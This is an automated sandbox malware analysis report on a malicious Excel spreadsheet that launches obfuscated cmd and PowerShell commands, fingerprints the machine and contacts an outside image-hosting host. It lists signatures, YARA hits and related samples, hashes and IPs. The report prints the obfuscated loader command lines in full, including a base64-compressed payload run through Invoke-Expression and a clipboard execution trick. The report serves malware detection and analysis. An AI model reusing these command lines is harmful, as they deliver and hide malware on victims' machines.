Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious

Behavior Graph ID: 740517
Sample: 20310_011_11353_0_88.xls
Start date: 13/12/2018
Architecture: WINDOWS
Score: 84
Signatures on the sample: Antivirus detection for submitted file; Multi AV Scanner detection for submitted file; Obfuscated command line found; 4 other signatures

Process tree (recovered from the graph data; the graph image itself is not reproduced here):

  • EXCEL.EXE 75 34, started; signatures: Obfuscated command line found; Very long command line found; Document exploit detected (process start blacklist hit)
    • cmd.exe, started
      • cmd.exe, started; signatures: Obfuscated command line found; Very long command line found; PowerShell case anomaly found
        • cmd.exe, started; signatures: Obfuscated command line found; PowerShell case anomaly found
          • powershell.exe 50 6, started; signature: Powershell connects to network
            • DNS/IP: images2.imgbox.com.sds.rncdn7.com 64.210.135.68, 443, 49211 SWIFTWILL2-SwiftwillIncUS United States
            • DNS/IP: images2.imgbox.com
        • cmd.exe, started
        • clip.exe, started

Simulations

Behavior and APIs

Time | Type | Description
21:40:27 | API Interceptor | 4952x Sleep call for process: EXCEL.EXE modified
21:40:30 | API Interceptor | 1x Sleep call for process: clip.exe modified
21:40:33 | API Interceptor | 3x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
20310_011_11353_0_88.xls | 22% | virustotal |
20310_011_11353_0_88.xls | 9% | metadefender |
20310_011_11353_0_88.xls | 100% | Avira | VBA/Dldr.Agent.yogrg

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000006.00000002.1249360856.012C0000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000002.1249342410.006B0000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000008.00000002.1264839354.01CC0000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1248635443.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000003.1249027719.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000008.00000002.1263643081.01290000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000008.00000002.1263634948.01287000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1248720839.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1248969895.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000008.00000002.1263500876.00400000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000008.00000002.1263628810.01280000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1248315695.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000002.1249262618.00340000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000008.00000002.1264845731.01CC7000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection
64.210.135.68 | Ft_000058_000_010994_10918.xls | f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1 | malicious
64.210.135.68 | Ft_000021_000_010695_10407.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious
64.210.135.68 | DOC2410201810129420.xls | 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e | malicious
64.210.135.68 | DOC2410201810129420.xls | 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e | malicious
64.210.135.68 | Ft_000059_000_010075_10942.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious
64.210.135.68 | DOC___.xls | c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a | malicious
64.210.135.68 | fatt F n.25570 2018.xls | 321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5 | malicious
64.210.135.68 | 3D0971 DOC20181101126.xls | 003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361 | malicious
64.210.135.68 | 3D0971 DOC20181101126.xls | 003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361 | malicious
64.210.135.68 | Ft_000059_000_010075_10942.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
images2.imgbox.com.sds.rncdn7.com | Ft_000058_000_010994_10918.xls | f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1 | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | Ft_000021_000_010695_10407.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | 8730944.xls | bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668 | malicious | 64.210.135.72
images2.imgbox.com.sds.rncdn7.com | DOC___.xls | c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a | malicious | 64.210.135.70
images2.imgbox.com.sds.rncdn7.com | Ft_000021_000_010695_10407.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious | 64.210.135.72
images2.imgbox.com.sds.rncdn7.com | 36Ft_000074_000_010126_10639.xls | 6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e | malicious | 64.210.135.72
images2.imgbox.com.sds.rncdn7.com | DOC2410201810129420.xls | 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | DOC2410201810129420.xls | 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | 8730944.xls | bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668 | malicious | 64.210.135.72
images2.imgbox.com.sds.rncdn7.com | 20181106xxxxx.xls | 81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804 | malicious | 64.210.135.70
images2.imgbox.com.sds.rncdn7.com | Ft_000059_000_010075_10942.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | Ft_000058_000_010994_10918.xls | f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1 | malicious | 64.210.135.70
images2.imgbox.com.sds.rncdn7.com | 52fatt F n.49198 2018.xls | ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0 | malicious | 64.210.135.70
images2.imgbox.com.sds.rncdn7.com | 52fatt F n.49198 2018.xls | ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0 | malicious | 64.210.135.70
images2.imgbox.com.sds.rncdn7.com | fatt F n.25570 2018.xls | 321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5 | malicious | 64.210.135.70
images2.imgbox.com.sds.rncdn7.com | DOC___.xls | c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | fatt F n.25570 2018.xls | 321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5 | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | 36Ft_000074_000_010126_10639.xls | 6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e | malicious | 64.210.135.70
images2.imgbox.com.sds.rncdn7.com | 3D0971 DOC20181101126.xls | 003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361 | malicious | 64.210.135.68
images2.imgbox.com.sds.rncdn7.com | 20181106xxxxx.xls | 81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804 | malicious | 64.210.135.70

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
SWIFTWILL2-SwiftwillIncUS | Ft_000058_000_010994_10918.xls | f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1 | malicious | 64.210.135.68
SWIFTWILL2-SwiftwillIncUS | Ft_000021_000_010695_10407.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious | 64.210.135.68
SWIFTWILL2-SwiftwillIncUS | 8730944.xls | bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668 | malicious | 64.210.135.72
SWIFTWILL2-SwiftwillIncUS | DOC___.xls | c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a | malicious | 64.210.135.70
SWIFTWILL2-SwiftwillIncUS | Ft_000021_000_010695_10407.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious | 64.210.135.72
SWIFTWILL2-SwiftwillIncUS | 36Ft_000074_000_010126_10639.xls | 6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e | malicious | 64.210.135.72
SWIFTWILL2-SwiftwillIncUS | DOC2410201810129420.xls | 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e | malicious | 64.210.135.68
SWIFTWILL2-SwiftwillIncUS | DOC2410201810129420.xls | 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e | malicious | 64.210.135.68
SWIFTWILL2-SwiftwillIncUS | 8730944.xls | bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668 | malicious | 64.210.135.72
SWIFTWILL2-SwiftwillIncUS | 20181106xxxxx.xls | 81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804 | malicious | 64.210.135.70
SWIFTWILL2-SwiftwillIncUS | ne4zvSJk0V.apk | b9985334412f3ee2b84fa5152384be7a0906afad62ac3e843499a48e2b28e8e9 | malicious | 94.199.253.33
SWIFTWILL2-SwiftwillIncUS | oTv8gvbipf.apk | 32ba51b250f73f29f47269d7edbc3982e1f864d6604f4396e58eaf9cb1b0194d | malicious | 94.199.253.33
SWIFTWILL2-SwiftwillIncUS | Ft_000059_000_010075_10942.xls | 0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540 | malicious | 64.210.135.68
SWIFTWILL2-SwiftwillIncUS | Ft_000058_000_010994_10918.xls | f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1 | malicious | 64.210.135.70
SWIFTWILL2-SwiftwillIncUS | 52fatt F n.49198 2018.xls | ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0 | malicious | 64.210.135.70
SWIFTWILL2-SwiftwillIncUS | 52fatt F n.49198 2018.xls | ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0 | malicious | 64.210.135.70
SWIFTWILL2-SwiftwillIncUS | fatt F n.25570 2018.xls | 321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5 | malicious | 64.210.135.70
SWIFTWILL2-SwiftwillIncUS | DOC___.xls | c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a | malicious | 64.210.135.68
SWIFTWILL2-SwiftwillIncUS | fatt F n.25570 2018.xls | 321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5 | malicious | 64.210.135.68
SWIFTWILL2-SwiftwillIncUS | 36Ft_000074_000_010126_10639.xls | 6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e | malicious | 64.210.135.70

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.